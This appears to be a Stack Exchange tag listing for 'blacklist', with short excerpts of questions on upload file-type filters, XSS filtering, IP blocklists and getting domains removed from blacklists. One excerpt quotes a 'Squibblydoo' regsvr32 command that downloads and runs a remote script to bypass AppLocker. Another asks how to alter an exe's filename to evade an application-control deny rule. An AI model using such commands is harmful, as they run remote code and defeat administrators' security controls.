IT Security Stack Exchange
IT Security Stack Exchange

Questions tagged [blacklist]

A blacklist is a list of data to filter be filtered out. A blacklist is the opposite of a whitelist. - Whitelist - only these things. - Blacklist - everything but these things.

44 questions
32
votes
1 answer

Is it possible to change original filename of an exe?

We are using an application control solution which denies access for some exes according to their original filename. Is it possible to change original filename with hex editor or another method?
frkntrn
  • 437
  • 1
  • 4
  • 6
10
votes
4 answers

Making a Blacklist of filetypes to protect PHP application

I'm working in a PHP system where the user can upload files. I'm trying to protect the system from malicious codes, so I'm thinking about some type of blacklist of files that I've to block from upload. I know that a Whitelist is better than a…
James
  • 265
  • 2
  • 9
7
votes
2 answers

How does this AppLocker bypass work, exactly? ("Squibblydoo")

I have read on a few blogs about a trick called "Squibblydoo", where the following command can bypass Windows' AppLocker: regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll Where the URL points to a script file that contains a command to open up…
Lucas Cioffi
  • 177
  • 1
  • 6
6
votes
5 answers

Blacklisting vs. whitelisting characters to prevent XSS?

I've been reading about XSS prevention on OWASP and other security channels. They all say that I should use ESAPI or a similar library and do input filtering through a whitelist approach. However, I use a framework (Webobjects) which encodes by…
Novice User
  • 2,088
  • 7
  • 26
  • 38
4
votes
1 answer

Is filtering flash based on the mimetype enough to keep it out?

As flash is a real security mess I started blacklisting flash at our proxy by blocking any content with the mime type application/x-shockwave-flash which works pretty well as far as I can tell. The proxy does SSL interception so it covers both http…
davidb
  • 4,285
  • 3
  • 19
  • 31
4
votes
1 answer

How to defend against a Spoofed-IP Blocklist DOS attack?

So I've implemented an IP Blocklist for the /login endpoint on my server. If any IP fails to login more than x number of attempts in x number of minutes the requesting IP is blocklisted for x number of minutes. That goes a long way in mitigating any…
AJB
  • 316
  • 2
  • 12
4
votes
2 answers

Blacklisting IP addresses -- when should we take action?

I am responsible for securing an AWS environment and am noticing various recon attacks against the environment. We have the option of blocking the IP addresses in our firewall, but the environment is scanned with different attacks multiple times a…
jay-charles
  • 1,209
  • 1
  • 11
  • 14
3
votes
1 answer

Can/should I automatically report network break-in attempts?

For the last 15 years I've been using SpamCop to report the spam I receive. I do this because it sometimes results in spammers and the third-party machines they compromise getting shut down, at least temporarily (as evidenced by the occasional…
Psychonaut
  • 615
  • 4
  • 14
2
votes
2 answers

Can ISPs be helpful in preventing spam?

I have received a number of phishing emails from various domains. I would like to prevent the domain from sending emails so that other people also don't get taken advantage of. I have not been successful talking to the registrar or host to take…
Abigal Wilson
  • 21
  • 1
2
votes
2 answers

Resolving "This website has been reported as unsafe" (Windows Defender SmartScreen)

I had a website that was compromised—the attacker planted malware that caused a redirect to a malicious site. The security holes have now been fixed and the malware has been removed. However, Microsoft Edge is still showing the message "This website…
David
  • 185
  • 1
  • 1
  • 7
2
votes
2 answers

Remove domain from web filter blacklists

A domain with a checkered past I work at a company that purchased a .com domain around a year ago, and it uses this domain for its web site and e-mail now. However, the previous owner had a site (last online several years back) on the domain which…
Herringbone Cat
  • 4,242
  • 15
  • 19
2
votes
0 answers

Are there any good OSINT feeds related to phone phishing?

There are lots of feeds related to fraudulent and malicious domains and IPs, but we're seeing more and more social engineering attempts coming in via phone. When these are reported to us, I'd like to document the phone number in our intelligence…
Ivan
  • 6,288
  • 3
  • 18
  • 22
2
votes
0 answers

Filter out ISPs from Whois results

I was wondering if there is any efficient way or any service (free or not) that may help me in order to identify companies behind IP addresses. I figured out that in some cases Whois may be really helpful for that. Unfortunately, in a lot of cases…
Theo Babilon
  • 121
  • 2
2
votes
1 answer

What is the lifespan of a C2?

I've been working on setting up dynamic blacklists, and one question that came up is how long typical entries should be kept on a blacklist. In the interest of equity, there should obviously be some point at which entries are aged out to prevent…
CrunchBangDev
  • 178
  • 7
2
votes
1 answer

Are there any standard practices for protecting against malicious links being entered in a public form?

A website I'm working on needs to have a form for any visitor to submit a request for information about a service. The user will not need to create an account, and contact details are just part of the form. The user can also enter a free form…
jpmc26
  • 823
  • 9
  • 17
1
2 3